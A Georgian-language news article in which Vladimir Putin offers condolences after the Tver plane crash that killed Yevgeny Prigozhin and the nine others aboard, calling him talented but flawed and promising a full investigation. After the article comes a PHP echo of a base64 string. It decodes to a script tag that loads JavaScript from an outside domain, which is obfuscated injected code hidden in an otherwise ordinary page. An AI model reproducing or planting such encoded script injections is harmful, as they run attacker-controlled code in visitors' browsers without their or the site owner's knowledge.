celsiusi
ავერსი შნაიდერი

ევგენი პრიგოჟინი რთული ბედის ადამიანი იყო, სერიოზული შეცდომები ჰქონდა ცხოვრებაში, – ამის შესახებ რუსეთის პრეზიდენტმა, ვლადიმერ პუტინმა განაცხადა. ვიდეოში, რომელიც რუსულმა მედიამ გაავრცელა. ვლადიმერ პუტინი რუსეთში მომხდარი ავიაკატასტროფის გამო სამძიმარს გამოთქვამს.

„პრიგოჟინს დიდი ხანია ვიცნობ. 90-იანების დასაწყისიდან. ის იყო რთული ბედის ადამიანი და სერიოზული შეცდომები ჰქონდა ცხოვრებაში. ის აღწევდა საჭირო შედეგებს საკუთარი თავისთვისაც, და როცა მე ვთხოვდი მას, საერთო საქმისთვისაც. ასე იყო ბოლო თვეებში. ის იყო ნიჭიერი ადამიანი, ნიჭიერი ბიზნესმენი, რომელიც წარმატებით მუშაობდა არამარტო რუსეთში, არამედ აფრიკაშიც”,- განაცხადა პუტინმა.

როგორც რუსეთის პრეზიდენტი აღნიშნავს, ავიაკატასტროფის მიზეზებზე უკვე დაწყებულია გამოძიება. მისივე თქმით, ამჟამად მიმდინარეობს ტექნიკური გამოკვლევები, რასაც დრო სჭირდება.

ამასთან, პუტინმა დარწმუნებით განაცხადა , რომ ამ საქმის გამოძიებას ბოლომდე მიიყვანენ.

მედიაში გავრცელდა ინფორმაცია, რომ ტვერის ოლქში ავიაკატასტროფის შედეგად ბორტზე მყოფი ათივე მგზავრი დაიღუპა. „როსავიაციამ“ დაადასტურა, რომ თვითმფრინავის ბორტზე ევგენი პრიგოჟინი იმყოფებოდა. რუსული მედიის ცნობით, ავიაკატასტროფის ადგილზე ათივე ადამიანის ცხედარია ნაპოვნი.

749
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");